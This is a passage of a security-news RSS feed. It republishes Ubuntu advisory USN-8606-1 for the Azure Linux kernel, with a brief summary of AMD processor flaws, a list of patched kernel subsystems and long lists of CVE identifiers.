CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8606-1: Linux kernel (Azure) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691498/unix-server/usn-8606-1-linux-kernel-azure-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691498/unix-server/usn-8606-1-linux-kernel-azure-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:41 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23207, CVE-2026-23220,
CVE-2026-23221, CVE-2026-23222, CVE-2026-23226, CVE-2026-23227,
CVE-2026-23228, CVE-2026-23229, CVE-2026-23230, CVE-2026-23233,
CVE-2026-23234, CVE-2026-23235, CVE-2026-23236, CVE-2026-23237,
CVE-2026-23238, CVE-2026-23241, CVE-2026-23242, CVE-2026-23243,
CVE-2026-23244, CVE-2026-23245, CVE-2026-23246, CVE-2026-23249,
CVE-2026-23253, CVE-2026-23255, CVE-2026-23266, CVE-2026-23267,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23272, CVE-2026-23276,
CVE-2026-23277, CVE-2026-23278, CVE-2026-23279, CVE-2026-23281,
CVE-2026-23284, CVE-2026-23285, CVE-2026-23286, CVE-2026-23287,
CVE-2026-23289, CVE-2026-23290, CVE-2026-23291, CVE-2026-23292,
CVE-2026-23293, CVE-2026-23296, CVE-2026-23298, CVE-2026-23300,
CVE-2026-23302, CVE-2026-23303, CVE-2026-23304, CVE-2026-23306,
CVE-2026-23307, CVE-2026-23308, CVE-2026-23310, CVE-2026-23312,
CVE-2026-23313, CVE-2026-23315, CVE-2026-23317, CVE-2026-23318,
CVE-2026-23319, CVE-2026-23321, CVE-2026-23324, CVE-2026-23325,
CVE-2026-23330, CVE-2026-23334, CVE-2026-23335, CVE-2026-23336,
CVE-2026-23339, CVE-2026-23340, CVE-2026-23343, CVE-2026-23347,
CVE-2026-23352, CVE-2026-23356, CVE-2026-23357, CVE-2026-23359,
CVE-2026-23360, CVE-2026-23361, CVE-2026-23362, CVE-2026-23363,
CVE-2026-23364, CVE-2026-23365, CVE-2026-23367, CVE-2026-23368,
CVE-2026-23369, CVE-2026-23370, CVE-2026-23372, CVE-2026-23374,
CVE-2026-23375, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381,
CVE-2026-23382, CVE-2026-23383, CVE-2026-23386, CVE-2026-23387,
CVE-2026-23388, CVE-2026-23389, CVE-2026-23391, CVE-2026-23392,
CVE-2026-23395, CVE-2026-23396, CVE-2026-23397, CVE-2026-23398,
CVE-2026-23399, CVE-2026-23401, CVE-2026-23412, CVE-2026-23413,
CVE-2026-23414, CVE-2026-23418, CVE-2026-23419, CVE-2026-23420,
CVE-2026-23426, CVE-2026-23428, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454,
CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458,
CVE-2026-23460, CVE-2026-23461, CVE-2026-23462, CVE-2026-23463,
CVE-2026-23464, CVE-2026-23465, CVE-2026-23468, CVE-2026-23470,
CVE-2026-23474, CVE-2026-23475, CVE-2026-31389, CVE-2026-31391,
CVE-2026-31392, CVE-2026-31393, CVE-2026-31394, CVE-2026-31396,
CVE-2026-31399, CVE-2026-31400, CVE-2026-31402, CVE-2026-31403,
CVE-2026-31405, CVE-2026-31407, CVE-2026-31408, CVE-2026-31409,
CVE-2026-31411, CVE-2026-31412, CVE-2026-31414, CVE-2026-31415,
CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31436, CVE-2026-31438, CVE-2026-31439, CVE-2026-31440,
CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448,
CVE-2026-31449, CVE-2026-31450, CVE-2026-31451, CVE-2026-31452,
CVE-2026-31453, CVE-2026-31454, CVE-2026-31455, CVE-2026-31458,
CVE-2026-31464, CVE-2026-31466, CVE-2026-31467, CVE-2026-31469,
CVE-2026-31470, CVE-2026-31473, CVE-2026-31474, CVE-2026-31476,
CVE-2026-31477, CVE-2026-31478, CVE-2026-31480, CVE-2026-31482,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31487, CVE-2026-31488,
CVE-2026-31489, CVE-2026-31492, CVE-2026-31494, CVE-2026-31495,
CVE-2026-31496, CVE-2026-31497, CVE-2026-31498, CVE-2026-31499,
CVE-2026-31500, CVE-2026-31502, CVE-2026-31503, CVE-2026-31505,
CVE-2026-31506, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31607,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31637, CVE-2026-31638,
CVE-2026-31639, CVE-2026-31642, CVE-2026-31645, CVE-2026-31646,
CVE-2026-31648, CVE-2026-31649, CVE-2026-31651, CVE-2026-31655,
CVE-2026-31656, CVE-2026-31657, CVE-2026-31658, CVE-2026-31659,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31668, CVE-2026-31669,
CVE-2026-31670, CVE-2026-31671, CVE-2026-31672, CVE-2026-31673,
CVE-2026-31674, CVE-2026-31675, CVE-2026-31677, CVE-2026-31678,
CVE-2026-31679, CVE-2026-31680, CVE-2026-31681, CVE-2026-31682,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31685, CVE-2026-31686,
CVE-2026-31687, CVE-2026-31689, CVE-2026-31693, CVE-2026-31694,
CVE-2026-31695, CVE-2026-31696, CVE-2026-31697, CVE-2026-31698,
CVE-2026-31699, CVE-2026-31700, CVE-2026-31701, CVE-2026-31702,
CVE-2026-31704, CVE-2026-31705, CVE-2026-31706, CVE-2026-31707,
